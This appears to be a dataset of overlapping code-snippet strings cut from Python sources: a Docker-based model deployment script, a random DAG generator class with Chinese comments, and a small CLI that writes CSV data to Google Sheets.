\"--addruntimedag %s %s %s %s %s %s", "if tup: self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(tup[-1], \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup]", "install'.split( ' ') run_cmd = ' '.join(run_as_lst + pkgs_to_install) with", "for name, url in [('query frontend', query_frontend_url), # ('management frontend',", "except ClipperException as e: self.logger.warning(\"Error starting Clipper: {}\".format(e.msg)) raise e", "except TypeError: df_contents = StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format(", "image=image) docker_client = docker.from_env() self.logger.info( \"Building model Docker image with" ]
[ "self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list() for i", "edge_num): for i in range(edge_num): mid = random.randint(1, self.n-2) st", "else: count = 0 for i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1:", "i!=j: return False return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for", "\" + str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) + \" \" +", "有环性 weighted 带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed = directed", "= list() for i in range(n): for j in range(n):", "1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if self.trim:#点从1开始 if self.weighted ==", "loop self.trim = trim if directed==True and connected=='weak' and loop==False:#弱连通有向无环", "loop 有环性 weighted 带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed =", "else: result = result.dot(temp) for i in range(self.n): for j", "directed self.weighted = weighted self.connected = connected self.loop = loop", "else: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) + random.randint(1,", "= numpy.zeros((n, n)) self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected =", "mid) end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def", "numpy import copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m,", "range(n): if self.matr[i][j]==1: e = (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def", "i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count)", "for i in range(self.n-1): if i==0: result = temp.dot(temp) else:", "for j in range(self.n): if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1", "count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list() for i in range(n): for", "weighted 带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed = directed self.weighted", "count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list() for i in", "RandomGenerTopoEdges(self, edge_num): for i in range(edge_num): mid = random.randint(1, self.n-2)", "random.randint(1, self.n-2) st = random.randint(0, mid) end = random.randint(mid+1, self.n-1)", "result[i][j]==0 and i!=j: return False return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self,", "__init__(self, n, m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True): \"\"\"", "i in range(self.n): for j in range(self.n): if result[i][j]==0 and", "self.weighted = weighted self.connected = connected self.loop = loop self.trim", "in range(self.n): if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for i", "str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始 if self.weighted == False: return", "有向性 connected 连通性 loop 有环性 weighted 带权性 trim True:点编号从1开始 False:点编号从0开始", "str(self.edges[i][1]) else: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) +", "\"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for i in range(edge_num): mid =", "j in range(self.n): if result[i][j]==0 and i!=j: return False return", "i==0: result = temp.dot(temp) else: result = result.dot(temp) for i", "if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list()", "\"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for i in range(self.n):", "while self.matr[self.topo[st]][self.topo[end]] != 0: mid = random.randint(1, self.n-2) st =", "(i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for", "and connected=='weak' and loop==False:#弱连通有向无环 self.n = n self.m = m", "n self.m = m self.matr = numpy.zeros((n, n)) self.topo =", "= result.dot(temp) for i in range(self.n): for j in range(self.n):", "random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1) else: count", "= m self.matr = numpy.zeros((n, n)) self.topo = list(range(n)) random.shuffle(self.topo)", "self.n = n self.m = m self.matr = numpy.zeros((n, n))", "range(self.n): for j in range(self.n): if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1:", "if self.weighted == False: return str(self.edges[i][0]) + \" \" +", "result.dot(temp) for i in range(self.n): for j in range(self.n): if", "for j in range(self.n): if result[i][j]==0 and i!=j: return False", "= self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1) else: count = 0 for", "if self.weighted == False: return str(self.edges[i][0]+1) + \" \" +", "self.weighted == False: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1)", "= copy.deepcopy(self.matr) for i in range(self.n): for j in range(self.n):", "= n self.m = m self.matr = numpy.zeros((n, n)) self.topo", "= list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1)", "self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1) else: count = 0 for i", "weak_connected = self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1) else: count = 0", "False return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for i in", "random import numpy import copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self,", "self.matr = numpy.zeros((n, n)) self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected", "weighted=False, trim=True): \"\"\" n 图中点的个数 m 图中边的个数 edge_weight 边的权值上限 directed", "False: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) else: return", "图中点的个数 m 图中边的个数 edge_weight 边的权值上限 directed 有向性 connected 连通性 loop", "False: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) else: return", "j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for i", "else:#点从0开始 if self.weighted == False: return str(self.edges[i][0]) + \" \"", "directed=True, connected='weak', loop=False, weighted=False, trim=True): \"\"\" n 图中点的个数 m 图中边的个数", "\" + str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始 if self.weighted ==", "GetEdge(self, i): if self.trim:#点从1开始 if self.weighted == False: return str(self.edges[i][0]+1)", "range(n): for j in range(n): if self.matr[i][j]==1: e = (i,", "in range(n): if self.matr[i][j]==1: e = (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\"", "= connected self.loop = loop self.trim = trim if directed==True", "self.loop = loop self.trim = trim if directed==True and connected=='weak'", "= random.randint(0, mid) end = random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] !=", "temp[j][i]==1: temp[i][j]=1 for i in range(self.n-1): if i==0: result =", "+ str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始 if self.weighted == False:", "def RandomGenerTopoEdges(self, edge_num): for i in range(edge_num): mid = random.randint(1,", "\" \" + str(self.edges[i][1]) else: return str(self.edges[i][0]) + \" \"", "edge_weight 边的权值上限 directed 有向性 connected 连通性 loop 有环性 weighted 带权性", "str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) +", "\" \" + str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) + \" \"", "+ str(self.edges[i][1]) else: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1])", "weighted self.connected = connected self.loop = loop self.trim = trim", "directed==True and connected=='weak' and loop==False:#弱连通有向无环 self.n = n self.m =", "in range(n): for j in range(n): if self.matr[i][j]==1: e =", "mid) end = random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0: mid", "loop==False:#弱连通有向无环 self.n = n self.m = m self.matr = numpy.zeros((n,", "= directed self.weighted = weighted self.connected = connected self.loop =", "connected='weak', loop=False, weighted=False, trim=True): \"\"\" n 图中点的个数 m 图中边的个数 edge_weight", "loop=False, weighted=False, trim=True): \"\"\" n 图中点的个数 m 图中边的个数 edge_weight 边的权值上限", "temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for i in range(self.n-1): if", "elif temp[j][i]==1: temp[i][j]=1 for i in range(self.n-1): if i==0: result", "for i in range(self.n): for j in range(self.n): if result[i][j]==0", "self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0: mid = random.randint(1, self.n-2) st", "else: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) + random.randint(1,", "= random.randint(0, mid) end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1", "= 0 for i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count", "result = result.dot(temp) for i in range(self.n): for j in", "st = random.randint(0, mid) end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] =", "m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True): \"\"\" n 图中点的个数", "in range(edge_num): mid = random.randint(1, self.n-2) st = random.randint(0, mid)", "+ random.randint(1, edge_weight) else:#点从0开始 if self.weighted == False: return str(self.edges[i][0])", "for i in range(self.n): for j in range(self.n): if temp[i][j]==1:", "= (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr)", "return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for i in range(edge_num):", "i in range(self.n-1): if i==0: result = temp.dot(temp) else: result", "st = random.randint(0, mid) end = random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]]", "self.trim:#点从1开始 if self.weighted == False: return str(self.edges[i][0]+1) + \" \"", "True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for i in range(edge_num): mid", "n)) self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if", "== False: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) else:", "连通性 loop 有环性 weighted 带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed", "range(self.n): if result[i][j]==0 and i!=j: return False return True \"\"\"在图中随机生成edge_num条边\"\"\"", "return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1)", "range(self.n): if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for i in", "copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m, edge_weight=1, directed=True,", "\"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False,", "if directed==True and connected=='weak' and loop==False:#弱连通有向无环 self.n = n self.m", "!= 0: mid = random.randint(1, self.n-2) st = random.randint(0, mid)", "def __init__(self, n, m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True):", "self.n-2) st = random.randint(0, mid) end = random.randint(mid+1, self.n-1) while", "return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) else: return str(self.edges[i][0])", "range(edge_num): mid = random.randint(1, self.n-2) st = random.randint(0, mid) end", "random.randint(0, mid) end = random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0:", "def GetEdge(self, i): if self.trim:#点从1开始 if self.weighted == False: return", "return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) + random.randint(1, edge_weight)", "self.matr[self.topo[st]][self.topo[end]] != 0: mid = random.randint(1, self.n-2) st = random.randint(0,", "self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list() for", "\" \" + str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始 if self.weighted", "0 for i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count =", "True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed = directed self.weighted = weighted self.connected", "self.n-2) st = random.randint(0, mid) end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]]", "if i==0: result = temp.dot(temp) else: result = result.dot(temp) for", "= trim if directed==True and connected=='weak' and loop==False:#弱连通有向无环 self.n =", "if self.matr[i][j]==1: e = (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self):", "i in range(edge_num): mid = random.randint(1, self.n-2) st = random.randint(0,", "mid = random.randint(1, self.n-2) st = random.randint(0, mid) end =", "+ \" \" + str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) + \"", "i in range(n): for j in range(n): if self.matr[i][j]==1: e", "e = (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp =", "random.randint(1, edge_weight) else:#点从0开始 if self.weighted == False: return str(self.edges[i][0]) +", "\" + str(self.edges[i][1]) else: return str(self.edges[i][0]) + \" \" +", "self.RandomGenerTopoEdges(n-1-count) self.edges = list() for i in range(n): for j", "temp = copy.deepcopy(self.matr) for i in range(self.n): for j in", "trim=True): \"\"\" n 图中点的个数 m 图中边的个数 edge_weight 边的权值上限 directed 有向性", "and i!=j: return False return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num):", "numpy.zeros((n, n)) self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity()", "j in range(self.n): if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for", "and loop==False:#弱连通有向无环 self.n = n self.m = m self.matr =", "result = temp.dot(temp) else: result = result.dot(temp) for i in", "self.directed = directed self.weighted = weighted self.connected = connected self.loop", "str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) else: return str(self.edges[i][0]) +", "False:点编号从0开始 \"\"\" self.directed = directed self.weighted = weighted self.connected =", "CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for i in range(self.n): for j", "return False return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for i", "i): if self.trim:#点从1开始 if self.weighted == False: return str(self.edges[i][0]+1) +", "random.randint(0, mid) end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\"", "in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges", "directed 有向性 connected 连通性 loop 有环性 weighted 带权性 trim True:点编号从1开始", "self.edges = list() for i in range(n): for j in", "\"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if self.trim:#点从1开始 if self.weighted == False:", "Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m, edge_weight=1, directed=True, connected='weak', loop=False,", "self.matr[i][j]==1: e = (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp", "in range(self.n): if result[i][j]==0 and i!=j: return False return True", "list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1) else:", "import numpy import copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n,", "connected 连通性 loop 有环性 weighted 带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\"", "self.trim = trim if directed==True and connected=='weak' and loop==False:#弱连通有向无环 self.n", "= loop self.trim = trim if directed==True and connected=='weak' and", "\"\"\" self.directed = directed self.weighted = weighted self.connected = connected", "in range(self.n): for j in range(self.n): if temp[i][j]==1: temp[j][i]=1 elif", "self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if self.trim:#点从1开始 if", "edge_weight) else:#点从0开始 if self.weighted == False: return str(self.edges[i][0]) + \"", "random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if", "= weighted self.connected = connected self.loop = loop self.trim =", "带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed = directed self.weighted =", "connected=='weak' and loop==False:#弱连通有向无环 self.n = n self.m = m self.matr", "trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed = directed self.weighted = weighted", "图中边的个数 edge_weight 边的权值上限 directed 有向性 connected 连通性 loop 有环性 weighted", "import random import numpy import copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def", "n, m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True): \"\"\" n", "self.connected = connected self.loop = loop self.trim = trim if", "weak_connected: self.RandomGenerTopoEdges(n-1) else: count = 0 for i in range(n-1):", "for i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1", "in range(self.n): for j in range(self.n): if result[i][j]==0 and i!=j:", "self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if self.trim:#点从1开始", "in range(self.n-1): if i==0: result = temp.dot(temp) else: result =", "+ \" \" + str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始 if", "self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1) else: count =", "if result[i][j]==0 and i!=j: return False return True \"\"\"在图中随机生成edge_num条边\"\"\" def", "temp.dot(temp) else: result = result.dot(temp) for i in range(self.n): for", "= temp.dot(temp) else: result = result.dot(temp) for i in range(self.n):", "= 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if self.trim:#点从1开始 if self.weighted", "n 图中点的个数 m 图中边的个数 edge_weight 边的权值上限 directed 有向性 connected 连通性", "= random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0: mid = random.randint(1,", "random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0: mid = random.randint(1, self.n-2)", "if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for i in range(self.n-1):", "== False: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) else:", "count = 0 for i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1", "0: mid = random.randint(1, self.n-2) st = random.randint(0, mid) end", "return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) + random.randint(1, edge_weight)", "temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for i in range(self.n-1): if i==0:", "trim if directed==True and connected=='weak' and loop==False:#弱连通有向无环 self.n = n", "for j in range(n): if self.matr[i][j]==1: e = (i, j)", "+ str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1)", "list() for i in range(n): for j in range(n): if", "range(self.n-1): if i==0: result = temp.dot(temp) else: result = result.dot(temp)", "range(self.n): for j in range(self.n): if result[i][j]==0 and i!=j: return", "m 图中边的个数 edge_weight 边的权值上限 directed 有向性 connected 连通性 loop 有环性", "+ \" \" + str(self.edges[i][1]) else: return str(self.edges[i][0]) + \"", "边的权值上限 directed 有向性 connected 连通性 loop 有环性 weighted 带权性 trim", "connected self.loop = loop self.trim = trim if directed==True and", "class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m, edge_weight=1, directed=True, connected='weak',", "import copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m, edge_weight=1,", "temp[i][j]=1 for i in range(self.n-1): if i==0: result = temp.dot(temp)", "for i in range(edge_num): mid = random.randint(1, self.n-2) st =", "self.weighted == False: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1])", "self.m = m self.matr = numpy.zeros((n, n)) self.topo = list(range(n))", "range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges =", "str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) +", "m self.matr = numpy.zeros((n, n)) self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1))", "self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for i in", "= count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list() for i in range(n):", "\"\"\" n 图中点的个数 m 图中边的个数 edge_weight 边的权值上限 directed 有向性 connected", "def CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for i in range(self.n): for", "if self.trim:#点从1开始 if self.weighted == False: return str(self.edges[i][0]+1) + \"", "self.RandomGenerTopoEdges(n-1) else: count = 0 for i in range(n-1): if", "i in range(self.n): for j in range(self.n): if temp[i][j]==1: temp[j][i]=1", "self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if weak_connected:", "j in range(n): if self.matr[i][j]==1: e = (i, j) self.edges.append(e)", "str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始", "copy.deepcopy(self.matr) for i in range(self.n): for j in range(self.n): if", "= random.randint(1, self.n-2) st = random.randint(0, mid) end = random.randint(mid+1,", "for i in range(n): for j in range(n): if self.matr[i][j]==1:", "end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self,", "if weak_connected: self.RandomGenerTopoEdges(n-1) else: count = 0 for i in", "= random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i):", "end = random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0: mid =", "edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True): \"\"\" n 图中点的个数 m" ]
[ "to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet import", "to write data from csv to G Sheets.\"\"\" cli_args =", "write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file import parse_file from", "module provides a console interface to convert CSV to Google", "csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet import write_to_sheet from csv2googlesheets.parse_file import", "the flow of operations to write data from csv to", "parse_file from csv2googlesheets.parse_cli_args import parse_cli_args def main(): \"\"\"Control the flow", "a console interface to convert CSV to Google Sheets.\"\"\" from", "convert CSV to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google from", "main(): \"\"\"Control the flow of operations to write data from", "auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, )", "from csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet", "auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet import write_to_sheet from", "from csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet import write_to_sheet from csv2googlesheets.parse_file", "provides a console interface to convert CSV to Google Sheets.\"\"\"", "= parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service =", "parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json)", "build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service,", "CSV to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet", "create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, ) if __name__ ==", "import auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet import write_to_sheet", "import build_spreadsheet_title from csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args import parse_cli_args", "csv2googlesheets.parse_cli_args import parse_cli_args def main(): \"\"\"Control the flow of operations", "build_spreadsheet_title from csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args import parse_cli_args def", "def main(): \"\"\"Control the flow of operations to write data", "to G Sheets.\"\"\" cli_args = parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title", "Sheets.\"\"\" cli_args = parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv)", "interface to convert CSV to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import", "import create_sheet from csv2googlesheets.gapi_write_to_sheet import write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title", "csv2googlesheets.gapi_write_to_sheet import write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file import", "from csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args import parse_cli_args def main():", "spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, ) if", "data from csv to G Sheets.\"\"\" cli_args = parse_cli_args() values", "create_sheet from csv2googlesheets.gapi_write_to_sheet import write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title from", "of operations to write data from csv to G Sheets.\"\"\"", "flow of operations to write data from csv to G", "csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args import", "parse_cli_args def main(): \"\"\"Control the flow of operations to write", "import parse_cli_args def main(): \"\"\"Control the flow of operations to", "write data from csv to G Sheets.\"\"\" cli_args = parse_cli_args()", "google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id,", "Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet from", "operations to write data from csv to G Sheets.\"\"\" cli_args", "G Sheets.\"\"\" cli_args = parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title =", "to convert CSV to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google", "csv to G Sheets.\"\"\" cli_args = parse_cli_args() values = parse_file(path=cli_args.csv)", "spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title)", "values = parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id", "= create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, ) if __name__", "= auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values,", "import parse_file from csv2googlesheets.parse_cli_args import parse_cli_args def main(): \"\"\"Control the", "from csv to G Sheets.\"\"\" cli_args = parse_cli_args() values =", "= parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id =", "write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, ) if __name__ == '__main__': main()", "<filename>csv2googlesheets/to_google_sheets.py \"\"\"This module provides a console interface to convert CSV", "cli_args = parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service", "parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service,", "csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet import", "csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args import parse_cli_args def 